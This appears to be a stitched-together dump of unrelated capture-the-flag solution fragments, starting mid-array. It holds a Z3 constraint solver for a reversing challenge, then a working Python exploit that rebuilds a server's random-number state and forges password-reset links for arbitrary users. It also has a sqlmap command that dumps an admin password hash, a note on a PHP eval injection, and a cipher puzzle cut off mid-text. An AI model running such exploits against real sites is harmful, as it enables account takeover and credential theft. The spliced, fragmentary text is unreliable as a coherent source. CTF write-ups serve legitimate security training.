46\x66\xFF\x65\x45\xFF\x65\x66","\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF","\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61","\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61","\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64","\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65","\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67","\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF","\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A","\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B","\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF","\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F","\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71","\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74","\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75","\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77","\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF","\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A","\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B","\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF","\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x1C\x23","\x60\x1C\x24\x61\x1C\x25\x62\x1C\x26\x63\x1C\x27\x64\x1C\x28\x65","\x1C\x29\x66\x1C\x2A\x67\x1C\x2B\x68\x1C\x2C\x69\x1C\x2D\x6A\x1C","\x2E\x6B\x1C\x2F\x6C\x1C\x30\x6D\x1C\x31\x6E\x1C\x32\x6F\x1C\x33","\x70\x1C\x34\x71\x1C\x35\x72\x1C\x36\x73\x1C\x37\x74\x1C\x38\x75","\x1C\x39\x76\x1C\x3A\x77\x1C\x3B\x78\x1C\x3C\x79\x1C\x3D\x7A\x1C","\x3E\x7B\x1C\x3F\x7C\xFF\x5C\x1C\x1D\x22\x60\x1D\x23\x61\x1D\x24","\x62\x1D\x25\x63\x1D\x26\x64\x1D\x27\x65\x1D\x28\x66\x1D\x29\x67","\x1D\x2A\x68\x1D\x2B\x69\x1D\x2C\x6A\x1D\x2D\x6B\x1D\x2E\x6C\x1D","\x2F\x6D\x1D\x30\x6E\x1D\x31\x6F\x1D\x32\x70\x1D\x33\x71\x1D\x34","\x72\x1D\x35\x73\x1D\x36\x74\x1D\x37\x75\x1D\x38\x76\x1D\x39\x77","\x1D\x3A\x78\x1D\x3B\x79\x1D\x3C\x7A\x1D\x3D\x7B\x1D\x3E\x7C\x1D","\x3F\x7D\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E","\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D","\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF","\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x7A\x59\x79\xFF\x78","\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF\x77\x78\x78\x57\x77","\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75\x55\xFF\x75\x76\x76","\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74\xFF\x73\x53\xFF\x73","\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73\x52\x72\xFF\x71\x51","\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70\xFF","\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E","\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D","\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF","\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF\x68","\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47\x67","\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65\x45\xFF\x65\x66\x66","\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF\x63","\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61\x41","\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61\xFF","\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64\x43","\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65\x44","\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67\xFF","\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF\x68","\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A","\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D","\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E","\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70","\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71\xFF","\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74\x53","\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75\x54","\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77\xFF","\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF\x78","\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A","\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D","\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E","\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x1D\x22\x60","\x1D\x23\x61\x1D\x24\x62\x1D\x25\x63\x1D\x26\x64\x1D\x27\x65\x1D","\x28\x66\x1D\x29\x67\x1D\x2A\x68\x1D\x2B\x69\x1D\x2C\x6A\x1D\x2D","\x6B\x1D\x2E\x6C\x1D\x2F\x6D\x1D\x30\x6E\x1D\x31\x6F\x1D\x32\x70","\x1D\x33\x71\x1D\x34\x72\x1D\x35\x73\x1D\x36\x74\x1D\x37\x75\x1D","\x38\x76\x1D\x39\x77\x1D\x3A\x78\x1D\x3B\x79\x1D\x3C\x7A\x1D\x3D","\x7B\x1D\x3E\x7C\x1D\x3F\x7D\xFF\x5D\x1D\x1E\x21\x60\x1E\x22\x61","\x1E\x23\x62\x1E\x24\x63\x1E\x25\x64\x1E\x26\x65\x1E\x27\x66\x1E","\x28\x67\x1E\x29\x68\x1E\x2A\x69\x1E\x2B\x6A\x1E\x2C\x6B\x1E\x2D","\x6C\x1E\x2E\x6D\x1E\x2F\x6E\x1E\x30\x6F\x1E\x31\x70\x1E\x32\x71","\x1E\x33\x72\x1E\x34\x73\x1E\x35\x74\x1E\x36\x75\x1E\x37\x76\x1E","\x38\x77\x1E\x39\x78\x1E\x3A\x79\x1E\x3B\x7A\x1E\x3C\x7B\x1E\x3D","\x7C\x1E\x3E\x7D\x1E\x3F\x7E\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E","\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF","\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B","\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A","\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF","\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75","\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74","\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73","\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70","\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E","\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF","\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B","\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A","\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF","\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65","\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64","\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63","\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61","\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63","\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF","\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46","\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47","\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF","\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B","\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D","\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70","\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71","\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73","\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF","\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56","\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57","\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF","\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B","\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D","\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF","\x5F\x7F\x1E\x21\x60\x1E\x22\x61\x1E\x23\x62\x1E\x24\x63\x1E\x25","\x64\x1E\x26\x65\x1E\x27\x66\x1E\x28\x67\x1E\x29\x68\x1E\x2A\x69","\x1E\x2B\x6A\x1E\x2C\x6B\x1E\x2D\x6C\x1E\x2E\x6D\x1E\x2F\x6E\x1E","\x30\x6F\x1E\x31\x70\x1E\x32\x71\x1E\x33\x72\x1E\x34\x73\x1E\x35","\x74\x1E\x36\x75\x1E\x37\x76\x1E\x38\x77\x1E\x39\x78\x1E\x3A\x79","\x1E\x3B\x7A\x1E\x3C\x7B\x1E\x3D\x7C\x1E\x3E\x7D\x1E\x3F\x7E\xFF","\x5E\x1E\x1F\x20\x60\x1F\x21\x61\x1F\x22\x62\x1F\x23\x63\x1F\x24","\x64\x1F\x25\x65\x1F\x26\x66\x1F\x27\x67\x1F\x28\x68\x1F\x29\x69","\x1F\x2A\x6A\x1F\x2B\x6B\x1F\x2C\x6C\x1F\x2D\x6D\x1F\x2E\x6E\x1F","\x2F\x6F\x1F\x30\x70\x1F\x31\x71\x1F\x32\x72\x1F\x33\x73\x1F\x34","\x74\x1F\x35\x75\x1F\x36\x76\x1F\x37\x77\x1F\x38\x78\x1F\x39\x79","\x1F\x3A\x7A\x1F\x3B\x7B\x1F\x3C\x7C\x1F\x3D\x7D\x1F\x3E\x7E\x1F","\x3F\x7F\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E","\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D","\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF","\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x7A\x59\x79\xFF\x78","\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF\x77\x78\x78\x57\x77","\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75\x55\xFF\x75\x76\x76","\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74\xFF\x73\x53\xFF\x73","\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73\x52\x72\xFF\x71\x51","\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70\xFF","\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E","\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D","\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF","\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF\x68","\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47\x67","\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65\x45\xFF\x65\x66\x66","\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF\x63","\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61\x41","\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61\xFF","\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64\x43","\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65\x44","\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67\xFF","\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF\x68","\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A","\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D","\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E","\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70","\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71\xFF","\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74\x53","\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75\x54","\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77\xFF","\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF\x78","\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A","\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D","\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E","\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x1F\x20\x60","\x1F\x21\x61\x1F\x22\x62\x1F\x23\x63\x1F\x24\x64\x1F\x25\x65\x1F","\x26\x66\x1F\x27\x67\x1F\x28\x68\x1F\x29\x69\x1F\x2A\x6A\x1F\x2B","\x6B\x1F\x2C\x6C\x1F\x2D\x6D\x1F\x2E\x6E\x1F\x2F\x6F\x1F\x30\x70","\x1F\x31\x71\x1F\x32\x72\x1F\x33\x73\x1F\x34\x74\x1F\x35\x75\x1F","\x36\x76\x1F\x37\x77\x1F\x38\x78\x1F\x39\x79\x1F\x3A\x7A\x1F\x3B","\x7B\x1F\x3C\x7C\x1F\x3D\x7D\x1F\x3E\x7E\x1F\x3F\x7F\xFF\x5F\x1F","\xFF\x40\x00\xFF\x00\x40\xFF\x41\x01\xFF\x01\x41\xFF\x42\x02\xFF","\x02\x42\xFF\x43\x03\xFF\x03\x43\xFF\x44\x04\xFF\x04\x44\xFF\x45","\x05\xFF\x05\x45\xFF\x46\x06\xFF\x06\x46\xFF\x47\x07\xFF\x07\x47","\xFF\x48\x08\xFF\x08\x48\xFF\x49\x09\xFF\x09\x49\xFF\x4A\x0A\xFF","\x0A\x4A\xFF\x4B\x0B\xFF\x0B\x4B\xFF\x4C\x0C\xFF\x0C\x4C\xFF\x4D","\x0D\xFF\x0D\x4D\xFF\x4E\x0E\xFF\x0E\x4E\xFF\x4F\x0F\xFF\x0F\x4F","\xFF\x50\x10\xFF\x10\x50\xFF\x51\x11\xFF\x11\x51\xFF\x52\x12\xFF","\x12\x52\xFF\x53\x13\xFF\x13\x53\xFF\x54\x14\xFF\x14\x54\xFF\x55","\x15\xFF\x15\x55\xFF\x56\x16\xFF\x16\x56\xFF\x57\x17\xFF\x17\x57","\xFF\x58\x18\xFF\x18\x58\xFF\x59\x19\xFF\x19\x59\xFF\x5A\x1A\xFF","\x1A\x5A\xFF\x5B\x1B\xFF\x1B\x5B\xFF\x5C\x1C\xFF\x1C\x5C\xFF\x5D","\x1D\xFF\x1D\x5D\xFF\x5E\x1E\xFF\x1E\x5E\xFF\x5F\x1F\xFF\x1F\x5F","\xE0\x52\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"])] string1 = [ord(c) for c in "".join(["\x30\x31\x31\x30\x31\x30\x30\x31\x30\x31\x31\x31\x30\x30\x31\x31","\x30\x31\x30\x31\x31\x31\x31\x31\x30\x31\x31\x31\x30\x31\x30\x30","\x30\x31\x31\x30\x31\x30\x30\x30\x30\x31\x31\x30\x31\x30\x30\x31","\x30\x31\x31\x31\x30\x30\x31\x31\x30\x31\x30\x31\x31\x31\x31\x31","\x30\x31\x31\x31\x30\x31\x30\x30\x30\x31\x31\x30\x31\x30\x30\x30","\x30\x31\x31\x30\x30\x31\x30\x31\x30\x31\x30\x31\x31\x31\x31\x31","\x30\x31\x31\x30\x30\x31\x31\x30\x30\x31\x31\x30\x31\x31\x30\x30","\x30\x31\x31\x30\x30\x30\x30\x31\x30\x31\x31\x30\x30\x31\x31\x31",])] string2 = [ord(c) for c in "".join(["\x31\x30\x30\x31\x30\x30\x31\x30\x30\x30\x30\x30\x31\x31\x30\x30","\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x31\x31","\x31\x30\x30\x30\x30\x31\x30\x31\x30\x31\x30\x30\x31\x30\x31\x30","\x31\x31\x31\x31\x31\x30\x30\x31\x31\x30\x31\x31\x31\x30\x30\x31","\x30\x31\x31\x30\x31\x30\x31\x31\x30\x30\x31\x30\x31\x31\x31\x31","\x30\x30\x30\x31\x31\x31\x31\x31\x31\x30\x31\x30\x30\x31\x31\x31","\x30\x30\x30\x31\x30\x31\x30\x31\x31\x30\x31\x30\x31\x30\x31\x31","\x30\x31\x31\x31\x31\x30\x30\x31\x31\x30\x30\x31\x31\x30\x31\x31",])] string3 = [ord(c) for c in "".join(["\x31\x31\x31\x30\x31\x31\x30\x31\x31\x31\x30\x30\x31\x30\x31\x31","\x31\x31\x31\x31\x30\x30\x31\x30\x30\x30\x30\x31\x30\x31\x30\x31","\x30\x31\x31\x31\x31\x31\x30\x30\x31\x30\x31\x31\x30\x30\x31\x30","\x31\x30\x31\x30\x31\x30\x31\x31\x30\x30\x30\x31\x31\x30\x30\x31","\x31\x31\x31\x30\x30\x30\x30\x31\x31\x30\x31\x31\x30\x30\x30\x31","\x31\x30\x31\x30\x31\x30\x31\x30\x30\x31\x30\x30\x30\x31\x31\x31","\x30\x30\x30\x30\x30\x31\x31\x30\x31\x31\x30\x31\x30\x31\x31\x31","\x30\x30\x31\x30\x30\x31\x30\x30\x31\x30\x30\x31\x31\x31\x31\x31",])] scratch_buf = [ord(c) for c in "".join(["\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30","\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31",])] def newBool(): newBool.i += 1 return Bool('b' + str(newBool.i))newBool.i = 0 class Buffer(object): def __init__(self, solver, values): self.solver = solver self.vals = [] for b in values: v = newBool() if b == 0x30: solver.add(v == False) else: solver.add(v == True) self.vals.append(v) def __getitem__(self, index): return self.vals[index] def __setitem__(self, key, value): v = newBool() solver.add(v == value) self.vals[key] = v solver = Solver()buf = Buffer(solver, scratch_buf)string1 = BoolVector("string1", 0x80)string2 = Buffer(solver, string2)string3 = Buffer(solver, string3) actually_zeros = []for off in xrange(0, 0x80, 0x20): for i, b in enumerate(string1[off:off+0x20] + string2[off:off+0x20]): buf[i] = b for i in xrange(0, 0x52e0, 3): buf[data[i + 2]] = Xor(buf[data[i+2]], And(buf[data[i]], buf[data[i+1]])) actually_zeros += buf[:0x20] for i, v in enumerate(actually_zeros): solver.add(v == string3[i]) print "Loaded constraints"print solver.check()print "Checked!"m = solver.model()ans = "".join("1" if eval(str(m[v])) else "0" for v in string1) print ''.join(chr(int(ans[i:i+8], 2)) for i in xrange(0, len(ans), 8))
#!/usr/bin/env python2## see: https://github.com/fx5/not_random and related article import sysimport osimport gzipimport randomfrom itertools import imapimport hashlib from lxml.etree import parse from progress import ProgressBar #HOST = 'example.com'HOST = 'ctf.phdays.com:12391'USERN = int(sys.argv[1])EMAIL = 'user%[email protected]' % USERNBROWSER = 'chromium' print "Loading Magic"f = gzip.GzipFile("magic_data","r")magic = eval(f.read())f.close()print "Done." print "Working...." progress = ProgressBar() def rebuild_random_from_string(string): return rebuild_random(list(imap(ord, string))) def rebuild_from_floats(floats): s = "".join(chr(int(i * 256)) for i in floats) return rebuild_random_from_string(s) def rebuild_random(vals): def getbit(bit): assert bit >= 0 return (vals[bit // 8] >> (7 - bit % 8)) & 1 state = [] for i in xrange(0, 624): progress.progress(i / 623.) val = 0 data = magic[i % 2] for bit in data: val <<= 1 for b in bit: val ^= getbit(b+(i//2)*8 - 8) state.append(val) state.append(0) ran = random.Random() ran.setstate((3, tuple(state),None)) for i in xrange(len(vals) - 3201 + 394): ran.randint(0,255) return ran def random_floats(length, random_module=random): return [random_module.random() for i in range(length)] def get_floats(n=3360): os.popen(r''' curl -v \ http://%(host)s/\?count\=%(count)d -o rw500_resp \ http://%(host)s/password_reset/ \ -d csrfmiddlewaretoken=23ca27c3882e0b9a1964d96e44c0481e \ -d email=%(email)s \ -H 'Cookie: csrftoken=23ca27c3882e0b9a1964d96e44c0481e' cat rw500_resp | \ sed 's/=\([0-9.]\+\)/="\1"/g' | \ sed 's,\(rand .*\)>,\1/>,g' >rw500_resp.xml ''' % {'host': HOST, 'count': n, 'email': EMAIL} ).close() xml = parse('rw500_resp.xml') return list(map(float, xml.xpath('rand/@value'))) if __name__ == "__main__": floats = get_floats(3400) my_random = rebuild_from_floats(floats[:3360]) for n, (i, j) in enumerate(zip(floats[-40:], [my_random.random() for i in range(40)])): assert '%.16f' % i == '%.16f' % j, Exception('%d (%f)' % ( n, abs(i - j) )) for i in range(5): url = 'http://%s/reset/%d-%s/' % ( HOST, USERN, hashlib.md5('%.16f' % my_random.random()).hexdigest() ) print(url) os.popen3('%s %s' % (BROWSER, url))
In The Name Of GOD;)hi my bro's;)<span>It is very easyDifference is that the web 150 is just the type of inject;)blind</span> injection:Puse sqlmap for inject:)<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web500/submit.php --data id=1 -p id --threads 10 --sql-query="select password from users where name='admin'" >>hash of admin password dumped;)good luck;)
The trick here was to spot the vulnerability. The scripts loads html from a controlled webpage with @file_get_contents(). It then parses the html for forms with regex to solves a basic math problem, with unescaped eval(). Finally the page submits a post request to the controlled webpage with file_get_contents().
# Rookie Agent ## The Given We have intercepted this encrypted message. Since the agent who has sent it, is not a pro, we believe decrypting it would be easy. Good luck! 6di16 ovhtm nzsls xqcjo 8fkdm tyrbn g4bg9 pwu9g lefmr k4bg9 ahmfm tyr4b g9htm 7ejcn zsbng 492cj olsxq 9glef mrk4b g9ahm fmtyr lsxq7 ejccj o9gle 9gle8 fkdls xq8fk dhtmn zs7ej c8fkd szxbn g4bg9 pwu7e jccjo 9gle9 gle8f kdlsx q8fkd htmnz s6dii pufmr kipul sxqmt yrmty ripug nslip u9gle 7ejc8 fkdgn sllsx qmtyr krwpo v4bg9 lsxq8 fkdmt yr16g nsl8f kdlsx q8fkd 6dinz s4bg9 htmah mffmr k8fkd mtyr1 6gnsl 8fkd8 fkdpw u8fkd htmfm rkcjo elqj8 fkdnz slsxq cjo4b g9htm ahmff mrk8f kd7ej c8fkd htmnz sbng8 fkdls xq8fk dlsxq mtyrs zxgns l5ha1 6fmrk cjo6d i9gle fmrk4 bg9ah mfmty rfmrk cjoel qj8fk dnzsb ng8fk d6dib ng8fk d6die lqj8f kdlsx q8fkd 7ejc9 glefm rk4bg 9ahmf 9gle1 6lsxq mtyrc joahm fhtm4 bg9fm rkcjo htmah mfnzs bng8f kd8fk dhtm7 ejc16 9gle4 bg9ls xq4bg 96di8 fkd16 lsxqq xvbng cjonz s8fkd 9glef mrk4b g9ahm fipu9 glejq vo8fk d4bg9 6di8f kd5ha ovnzs 4bg9f mrkfm rk7ej ccjot y9gle 4bg96 dinzs mtyr4 bg9ls xq8fk dcjol sxqls xq8fk dfmrk 8fkdp wu4bg 9htmn zs9gl efmrk 4bg9a 